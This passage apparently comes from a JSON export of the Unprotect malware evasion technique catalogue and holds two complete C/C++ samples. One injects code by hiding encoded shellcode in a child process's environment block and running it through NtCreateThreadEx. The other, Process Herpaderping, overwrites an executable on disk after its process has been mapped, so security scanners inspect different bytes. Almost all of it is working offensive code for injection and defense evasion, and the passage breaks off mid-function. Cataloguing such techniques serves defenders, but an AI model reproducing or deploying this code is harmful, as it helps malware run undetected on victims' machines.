0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualAlloc)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov edi, eax (DataAddr)\r\n\t0x8B, 0xF8,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (ProcessID)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (bInheritHandle)\r\n\t0x50,\r\n\t// push 0x10 (PROCESS_VM_READ)\r\n\t0x6A, 0x10,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (OpenProcess)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov esi, eax (ProcessHandle)\r\n\t0x8B, 0xF0,\r\n\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (NumberOfBytesRead)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BytesToRead)\r\n\t0x50,\r\n\t// push edi (ReadBuffer)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (ReadProcessMemory)\r\n\t0xFF, 0xD0,\r\n\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (CloseHandle)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pushad\r\n\t0x60,\r\n\t// call edi (DataAddr)\r\n\t0xFF, 0xD7,\r\n\t// popad\r\n\t0x61,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_RELEASE)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// push edi (DataAddr)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualFree)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pop esi\r\n\t0x5E,\r\n\t// pop edi\r\n\t0x5F,\r\n\r\n\t// return from thread cleanly - can't use \"retn 4\"\r\n\t// pop eax\r\n\t0x58,\r\n\t// pop ecx\r\n\t0x59,\r\n\t// push eax\r\n\t0x50,\r\n\t// ret\r\n\t0xC3,\r\n\r\n\t// (end of string - 2 widechar null characters)\r\n\t0x00, 0x00, 0x00, 0x00\r\n};\r\n\r\nDWORD EncodeDwordValue(DWORD dwValue, DWORD *pdwXorValue, DWORD *pdwEncodedValue)\r\n{\r\n\tBYTE bOrigValue[4];\r\n\tBYTE bXorValue[4];\r\n\tBYTE bEncodedValue[4];\r\n\r\n\t// copy original value\r\n\tmemcpy((void*)bOrigValue, (void*)&dwValue, sizeof(DWORD));\r\n\r\n\t// encode value\r\n\tfor(DWORD i = 0; i < sizeof(DWORD); i++)\r\n\t{\r\n\t\tbXorValue[i] = 0x01;\r\n\t\tfor(;;)\r\n\t\t{\r\n\t\t\t// ensure the value contains no 0x00 bytes\r\n\t\t\tbEncodedValue[i] = bOrigValue[i] ^ bXorValue[i];\r\n\t\t\tif(bEncodedValue[i] == 0 || bXorValue[i] == 0)\r\n\t\t\t{\r\n\t\t\t\tbXorValue[i]++;\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t// store values\r\n\t*pdwXorValue = *(DWORD*)bXorValue;\r\n\t*pdwEncodedValue = *(DWORD*)bEncodedValue;\r\n\r\n\treturn 0;\r\n}\r\n\r\nDWORD StartInjectedProcess(char *pExePath, BYTE *pPayload, DWORD dwPayloadSize)\r\n{\r\n\tSTARTUPINFO StartupInfo;\r\n\tPROCESS_INFORMATION ProcessInfo;\r\n\tBYTE bLoaderCode_Copy[sizeof(bGlobal_LoaderCode)];\r\n\tPROCESS_BASIC_INFORMATION ProcessBasicInfoData;\r\n\tBYTE *pRemotePtr_RtlUserProcessParameters = NULL;\r\n\tBYTE *pRemotePtr_EnvironmentStr = NULL;\r\n\tDWORD dwOriginalProtect = 0;\r\n\tHANDLE hThread = NULL;\r\n\tDWORD dwTempProtect = 0;\r\n\twchar_t *pOrigEnvBlock = NULL;\r\n\tDWORD dwOrigEnvBlockTotalLengthBytes = 0;\r\n\tDWORD dwCurrEnvEntryLength = 0;\r\n\twchar_t *pCurrEnvEntry = NULL;\r\n\tBYTE *pNewEnvBlock = NULL;\r\n\r\n\t// ensure the loader code is 16-bit aligned\r\n\tif((sizeof(bGlobal_LoaderCode) % 2) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Loader code is out of alignment\\n\");\r\n\t\t// loader code is out of alignment - add an extra 0x00 character to the end of the data\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Generating loader code...\\n\");\r\n\r\n\t// encode values in the loader code to ensure no 0x00 characters exist\r\n\tEncodeDwordValue(MEM_COMMIT | MEM_RESERVE, (DWORD*)&bGlobal_LoaderCode[13], (DWORD*)&bGlobal_LoaderCode[18]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[24], (DWORD*)&bGlobal_LoaderCode[29]);\r\n\tEncodeDwordValue((DWORD)VirtualAlloc, (DWORD*)&bGlobal_LoaderCode[38], (DWORD*)&bGlobal_LoaderCode[43]);\r\n\tEncodeDwordValue(GetCurrentProcessId(), (DWORD*)&bGlobal_LoaderCode[52], (DWORD*)&bGlobal_LoaderCode[57]);\r\n\tEncodeDwordValue((DWORD)OpenProcess, (DWORD*)&bGlobal_LoaderCode[68], (DWORD*)&bGlobal_LoaderCode[73]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[85], (DWORD*)&bGlobal_LoaderCode[90]);\r\n\tEncodeDwordValue((DWORD)pPayload, (DWORD*)&bGlobal_LoaderCode[97], (DWORD*)&bGlobal_LoaderCode[102]);\r\n\tEncodeDwordValue((DWORD)ReadProcessMemory, (DWORD*)&bGlobal_LoaderCode[109], (DWORD*)&bGlobal_LoaderCode[114]);\r\n\tEncodeDwordValue((DWORD)CloseHandle, (DWORD*)&bGlobal_LoaderCode[122], (DWORD*)&bGlobal_LoaderCode[127]);\r\n\tEncodeDwordValue(MEM_RELEASE, (DWORD*)&bGlobal_LoaderCode[138], (DWORD*)&bGlobal_LoaderCode[143]);\r\n\tEncodeDwordValue((DWORD)VirtualFree, (DWORD*)&bGlobal_LoaderCode[153], (DWORD*)&bGlobal_LoaderCode[158]);\r\n\r\n\tprintf(\"Appending code to existing environment string...\\n\");\r\n\r\n\t// get existing environment block\r\n\tpOrigEnvBlock = GetEnvironmentStringsW();\r\n\tif(pOrigEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read environment strings\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// calculate length of existing environment block\r\n\tfor(;;)\r\n\t{\r\n\t\t// get current environment string entry\r\n\t\tpCurrEnvEntry = (wchar_t*)((BYTE*)pOrigEnvBlock + dwOrigEnvBlockTotalLengthBytes);\r\n\r\n\t\t// calculate length\r\n\t\tdwCurrEnvEntryLength = wcslen(pCurrEnvEntry);\r\n\t\tif(dwCurrEnvEntryLength == 0)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t// increase total size counter\r\n\t\tdwOrigEnvBlockTotalLengthBytes += ((dwCurrEnvEntryLength + 1) * sizeof(wchar_t));\r\n\t}\r\n\r\n\t// allocate a new environment string buffer\r\n\tpNewEnvBlock = (BYTE*)VirtualAlloc(NULL, dwOrigEnvBlockTotalLengthBytes + sizeof(bGlobal_LoaderCode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\tif(pNewEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to allocate local memory\\n\");\r\n\r\n\t\t// error\r\n\t\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// copy the original values and append the loader code\r\n\tmemcpy((void*)pNewEnvBlock, pOrigEnvBlock, dwOrigEnvBlockTotalLengthBytes);\r\n\tmemcpy((void*)(pNewEnvBlock + dwOrigEnvBlockTotalLengthBytes), bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode));\r\n\r\n\t// free temporary environment string buffer\r\n\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\tprintf(\"Creating target process: '%s'...\\n\", pExePath);\r\n\r\n\t// launch target process with the injection code in the environment strings\t\r\n\tmemset(&StartupInfo, 0, sizeof(StartupInfo));\r\n\tStartupInfo.cb = sizeof(StartupInfo);\r\n\tif(CreateProcess(NULL, pExePath, NULL, NULL, 0, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED, (wchar_t*)pNewEnvBlock, NULL, &StartupInfo, &ProcessInfo) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to launch target process\\n\");\r\n\r\n\t\t// error\r\n\t\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// free environment block buffer\r\n\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\tprintf(\"Locating target code in remote process...\\n\");\r\n\r\n\t// get process info\r\n\tmemset((void*)&ProcessBasicInfoData, 0, sizeof(ProcessBasicInfoData));\r\n\tif(NtQueryInformationProcess(ProcessInfo.hProcess, ProcessBasicInformation, &ProcessBasicInfoData, sizeof(ProcessBasicInfoData), NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to retrieve process info\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// create a thread that calls Sleep(0) to initialise the environment strings in the PEB\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, Sleep, (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create Sleep thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// read RtlUserProcessParameters ptr from PEB\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(ProcessBasicInfoData.PebBaseAddress + 0x10), (void*)&pRemotePtr_RtlUserProcessParameters, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read RtlUserProcessParameters value from PEB\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// read EnvironmentStr ptr from RtlUserProcessParameters\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(pRemotePtr_RtlUserProcessParameters + 0x48), (void*)&pRemotePtr_EnvironmentStr, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read EnvironmentStr value from RtlUserProcessParameters\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// update environment string ptr to ignore the original bytes\r\n\tpRemotePtr_EnvironmentStr += dwOrigEnvBlockTotalLengthBytes;\r\n\r\n\t// read EnvironmentStr value\r\n\tmemset(bLoaderCode_Copy, 0, sizeof(bLoaderCode_Copy));\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)pRemotePtr_EnvironmentStr, (void*)bLoaderCode_Copy, sizeof(bGlobal_LoaderCode), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read loader data from EnvironmentStr\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// ensure the loader code has been copied correctly\r\n\tif(memcmp(bLoaderCode_Copy, bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode)) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Invalid loader data\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Executing code in remote process...\\n\");\r\n\r\n\t// temporarily make the loader code executable\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), PAGE_EXECUTE_READWRITE, &dwOriginalProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// execute payload\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, (BYTE*)(pRemotePtr_EnvironmentStr + LOADER_CODE_OFFSET), (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create code loader thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// restore original protection value\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), dwOriginalProtect, &dwTempProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// resume main thread\r\n\tResumeThread(ProcessInfo.hThread);\r\n\r\n\t// close handles\r\n\tCloseHandle(ProcessInfo.hThread);\r\n\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tchar *pExePath = NULL;\r\n\r\n\tBYTE bPayload[] =\r\n\t{\r\n\t\t// string: <user32.dll>\r\n\t\t// push 0x00006C6C\r\n\t\t0x68, 0x6C, 0x6C, 0x00, 0x00,\r\n\t\t// push 0x642E3233\r\n\t\t0x68, 0x33, 0x32, 0x2E, 0x64,\r\n\t\t// push 0x72657375\r\n\t\t0x68, 0x75, 0x73, 0x65, 0x72,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// push ecx (ModuleName)\r\n\t\t0x51,\r\n\t\t// mov eax, LoadLibraryA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t // string: <Code injected successfully!>\r\n\t\t// push 0x0021796C\r\n\t\t0x68, 0x6C, 0x79, 0x21, 0x00,\r\n\t\t// push 0x6C756673\r\n\t\t0x68, 0x73, 0x66, 0x75, 0x6C,\r\n\t\t// push 0x73656363\r\n\t\t0x68, 0x63, 0x63, 0x65, 0x73,\r\n\t\t// push 0x75732064\r\n\t\t0x68, 0x64, 0x20, 0x73, 0x75,\r\n\t\t// push 0x65746365\r\n\t\t0x68, 0x65, 0x63, 0x74, 0x65,\r\n\t\t// push 0x6A6E6920\r\n\t\t0x68, 0x20, 0x69, 0x6E, 0x6A,\r\n\t\t// push 0x65646F43\r\n\t\t0x68, 0x43, 0x6F, 0x64, 0x65,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// string: <www.x86matthew.com>\r\n\t\t// push 0x00006D6F\r\n\t\t0x68, 0x6F, 0x6D, 0x00, 0x00,\r\n\t\t// push 0x632E7765\r\n\t\t0x68, 0x65, 0x77, 0x2E, 0x63,\r\n\t\t// push 0x68747461\r\n\t\t0x68, 0x61, 0x74, 0x74, 0x68,\r\n\t\t// push 0x6D363878\r\n\t\t0x68, 0x78, 0x38, 0x36, 0x6D,\r\n\t\t// push 0x2E777777\r\n\t\t0x68, 0x77, 0x77, 0x77, 0x2E,\r\n\t\t// mov ebx, esp\r\n\t\t0x8B, 0xDC,\r\n\t\t// push MB_OK\r\n\t\t0x6A, 0x00,\r\n\t\t// push ebx (Caption)\r\n\t\t0x53,\r\n\t\t// push ecx (Text)\r\n\t\t0x51,\r\n\t\t// push hWnd\r\n\t\t0x6A, 0x00,\r\n\t\t// mov eax, MessageBoxA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t// add esp, 0x3C\r\n\t\t0x83, 0xC4, 0x3C,\r\n\r\n\t\t// ret\r\n\t\t0xC3\r\n\t};\r\n\r\n\t// set function addresses\r\n\t*(DWORD*)&bPayload[19] = (DWORD)LoadLibraryA;\r\n\t*(DWORD*)&bPayload[96] = (DWORD)MessageBoxA;\r\n\r\n\tprintf(\"ProcEnvInjection - www.x86matthew.com\\n\\n\");\r\n\r\n\t// check params\r\n\tif(argc != 2)\r\n\t{\r\n\t\tprintf(\"Usage: %s [exe_path]\\n\\n\", argv[0]);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get cmd param\r\n\tpExePath = argv[1];\r\n\t\r\n\t// get NtQueryInformationProcess function\r\n\tNtQueryInformationProcess = (unsigned long (__stdcall *)(void *,unsigned long,void *,unsigned long,unsigned long *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryInformationProcess\");\r\n\tif(NtQueryInformationProcess == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get NtCreateThreadEx function\r\n\tNtCreateThreadEx = (unsigned long (__stdcall *)(void ** ,unsigned long,void *,void *,void *,void *,unsigned long,unsigned long *,unsigned long,unsigned long,void *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtCreateThreadEx\");\r\n\tif(NtCreateThreadEx == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// start target process\r\n\tif(StartInjectedProcess(pExePath, bPayload, sizeof(bPayload)) != 0)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Injected successfully\\n\");\r\n\r\n\treturn 0;\r\n}"
},
{
"id": 74,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/170/?format=api",
"description": "",
"plain_code": "//\r\n// Copyright (c) Johnny Shaw. All rights reserved.\r\n// \r\n// File: source/ProcessHerpaderping/herpaderp.cpp\r\n// Author: Johnny Shaw\r\n// Abstract: Herpaderping Functionality\r\n//\r\n#include \"pch.hpp\"\r\n#include \"herpaderp.hpp\"\r\n#include \"utils.hpp\"\r\n\r\n_Use_decl_annotations_\r\nHRESULT Herpaderp::ExecuteProcess(\r\n const std::wstring& SourceFileName,\r\n const std::wstring& TargetFileName,\r\n const std::optional<std::wstring>& ReplaceWithFileName,\r\n std::span<const uint8_t> Pattern, \r\n uint32_t Flags)\r\n{\r\n if (FlagOn(Flags, FlagHoldHandleExclusive) && \r\n FlagOn(Flags, FlagCloseFileEarly))\r\n {\r\n //\r\n // Incompatible flags.\r\n //\r\n return E_INVALIDARG;\r\n }\r\n\r\n if (FlagOn(Flags, FlagWaitForProcess) &&\r\n FlagOn(Flags, FlagKillSpawnedProcess))\r\n {\r\n //\r\n // Incompatible flags.\r\n //\r\n return E_INVALIDARG;\r\n }\r\n\r\n wil::unique_handle processHandle;\r\n //\r\n // If something goes wrong, we'll terminate the process.\r\n //\r\n auto terminateProcess = wil::scope_exit([&processHandle]() -> void\r\n {\r\n if (processHandle.is_valid())\r\n {\r\n TerminateProcess(processHandle.get(), 0);\r\n }\r\n });\r\n\r\n Utils::Log(Log::Success, L\"Source File: \\\"%ls\\\"\", SourceFileName.c_str());\r\n Utils::Log(Log::Success, L\"Target File: \\\"%ls\\\"\", TargetFileName.c_str());\r\n\r\n //\r\n // Open the source binary and the target file we will execute it from.\r\n //\r\n wil::unique_handle sourceHandle;\r\n sourceHandle.reset(CreateFileW(SourceFileName.c_str(),\r\n GENERIC_READ,\r\n FILE_SHARE_READ | \r\n FILE_SHARE_WRITE | \r\n FILE_SHARE_DELETE,\r\n nullptr,\r\n OPEN_EXISTING,\r\n FILE_ATTRIBUTE_NORMAL,\r\n nullptr));\r\n if (!sourceHandle.is_valid())\r\n {\r\n RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n GetLastError(), \r\n L\"Failed to open source file\"));\r\n }\r\n\r\n std::wstring targetFileName = TargetFileName;\r\n if (FlagOn(Flags, FlagDirectory))\r\n {\r\n Utils::Log(Log::Information, \r\n L\"Targeting Directory: \\\"%ls\\\"\", \r\n targetFileName.c_str());\r\n\r\n wil::unique_handle dirHandle;\r\n if (CreateDirectoryW(targetFileName.c_str(), nullptr) == FALSE)\r\n {\r\n RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n GetLastError(), \r\n L\"Failed to create directory\"));\r\n }\r\n\r\n targetFileName += L\":exe\";\r\n\r\n Utils::Log(Log::Information, \r\n L\"Using Directory Stream: \\\"%ls\\\"\", \r\n targetFileName.c_str());\r\n }\r\n\r\n DWORD shareMode = (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE);\r\n if (FlagOn(Flags, FlagHoldHandleExclusive))\r\n {\r\n Utils::Log(Log::Information, \r\n L\"Creating target file with exclusive access\");\r\n shareMode = 0;\r\n }\r\n\r\n wil::unique_handle targetHandle;\r\n targetHandle.reset(CreateFileW(targetFileName.c_str(),\r\n GENERIC_READ | GENERIC_WRITE,\r\n shareMode,\r\n nullptr,\r\n CREATE_ALWAYS,\r\n FILE_ATTRIBUTE_NORMAL,\r\n nullptr));\r\n if(!targetHandle.is_valid())\r\n {\r\n RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n GetLastError(), \r\n L\"Failed to create target file\"));\r\n }\r\n\r\n //\r\n // Copy the content of the source process to the target.\r\n //\r\n HRESULT hr = Utils::CopyFileByHandle(sourceHandle.get(),\r\n targetHandle.get());\r\n if (FAILED(hr))\r\n {\r\n Utils::Log(Log::Error,\r\n hr,\r\n L\"Failed to copy source binary to target file\");\r\n RETURN_HR(hr);\r\n }\r\n\r\n Utils::Log(Log::Information, L\"Copied source binary to target file\");\r\n\r\n //\r\n // We're done with the source binary.\r\n //\r\n sourceHandle.reset();\r\n\r\n //\r\n // Map and create the target process. We'll make it all derpy in a moment...\r\n //\r\n wil::unique_handle sectionHandle;\r\n auto status = NtCreateSection(§ionHandle,\r\n SECTION_ALL_ACCESS,\r\n nullptr,\r\n nullptr,\r\n PAGE_READONLY,\r\n SEC_IMAGE,\r\n targetHandle.get());\r\n if (!NT_SUCCESS(status))\r\n {\r\n sectionHandle.release();\r\n RETURN_NTSTATUS(Utils::Log(\r\n Log::Error, \r\n status, \r\n L\"Failed to create target file image section\"));\r\n }\r\n\r\n Utils::Log(Log::Information, L\"Created image section for target\");\r\n\r\n status = NtCreateProcessEx(&processHandle,\r\n PROCESS_ALL_ACCESS,\r\n nullptr,\r\n NtCurrentProcess(),\r\n PROCESS_CREATE_FLAGS_INHERIT_HANDLES,\r\n sectionHandle.get(),\r\n nullptr,\r\n nullptr,\r\n 0);\r\n if (!NT_SUCCESS(status))\r\n {\r\n processHandle.release();\r\n RETURN_NTSTATUS(Utils::Log(Log::Error, \r\n status, \r\n L\"Failed to create process\"));\r\n }\r\n\r\n Utils::Log(Log::Information,\r\n L\"Created process object, PID %lu\",\r\n GetProcessId(processHandle.get()));\r\n\r\n //\r\n // Alright we have the process set up, we don't need the section.\r\n //\r\n sectionHandle.reset();\r\n\r\n //\r\n // Go get the remote entry RVA to create a thread later on.\r\n //\r\n uint32_t imageEntryPointRva;\r\n hr = Utils::GetImageEntryPointRva(targetHandle.get(),\r\n imageEntryPointRva);\r\n if (FAILED(hr))\r\n {\r\n Utils::Log(Log::Error, \r\n hr, \r\n L\"Failed to get target file image entry RVA\");\r\n RETURN_HR(hr);\r\n }\r\n\r\n Utils::Log(Log::Information,\r\n L\"Located target image entry RVA 0x%08x\",\r\n imageEntryPointRva);\r\n\r\n //\r\n // Alright, depending on the parameter passed in. We will either:\r\n // A. Overwrite the target binary with another.\r\n // B. Overwrite the target binary with a pattern.\r\n //\r\n if (ReplaceWithFileName.has_value())\r\n {\r\n //\r\n // (A) We are overwriting the binary with another file.\r\n //\r\n Utils::Log(Log::Success,\r\n L\"Replacing target with \\\"%ls\\\"\",\r\n ReplaceWithFileName->c_str());\r\n\r\n wil::unique_handle replaceWithHandle;\r\n replaceWithHandle.reset(CreateFileW(ReplaceWithFileName->c_str(),\r\n GENERIC_READ,\r\n FILE_SHARE_READ |\r\n FILE_SHARE_WRITE |\r\n FILE_SHARE_DELETE,\r\n nullptr,\r\n OPEN_EXISTING,\r\n FILE_ATTRIBUTE_NORMAL,\r\n nullptr));\r\n\r\n if (!replaceWithHandle.is_valid())\r\n {\r\n RETURN_LAST_ERROR_SET(Utils::Log(\r\n Log::Error, \r\n GetLastError(), \r\n L\"Failed to open replace with file\"));\r\n }\r\n\r\n //\r\n // Replace the bytes. We handle a failure here. We'll fix it up after.\r\n //\r\n hr = Utils::CopyFileByHandle(replaceWithHandle.get(),\r\n targetHandle.get(),\r\n FlagOn(Flags, FlagFlushFile));\r\n if (FAILED(hr))\r\n {\r\n if (hr != HRESULT_FROM_WIN32(ERROR_USER_MAPPED_FILE))\r\n {\r\n Utils::Log(Log::Error, \r\n hr,\r\n L\"Failed to replace target file\");\r\n RETURN_HR(hr);\r\n }\r\n\r\n //\r\n // This error occurs when trying to truncate a file that has a\r\n // user mapping open. In other words, the file we tried to replace\r\n // with was smaller than the original.\r\n // Let's fix up the replacement to hide the original bytes and \r\n // retain any signer info.\r\n //\r\n Utils::Log(Log::Information,\r\n L\"Fixing up target replacement, \"\r\n L\"hiding original bytes and retaining any signature\");\r\n\r\n uint64_t replaceWithSize;\r\n hr = Utils::GetFileSize(replaceWithHandle.get(), replaceWithSize);\r\n if (FAILED(hr))\r\n {\r\n Utils::Log(Log::Error, \r\n hr,\r\n L\"Failed to get replace with file size\");\r\n RETURN_HR(hr);\r\n }\r\n\r\n uint32_t bytesWritten = 0;\r\n hr = Utils::OverwriteFileAfterWithPattern(\r\n targetHandle.get(),\r\n replaceWithSize,\r\n Pattern,\r\n bytesWritten,\r\n FlagOn(Flags, FlagFlushFile));\r\n if (FAILED(hr))\r\n {\r\n 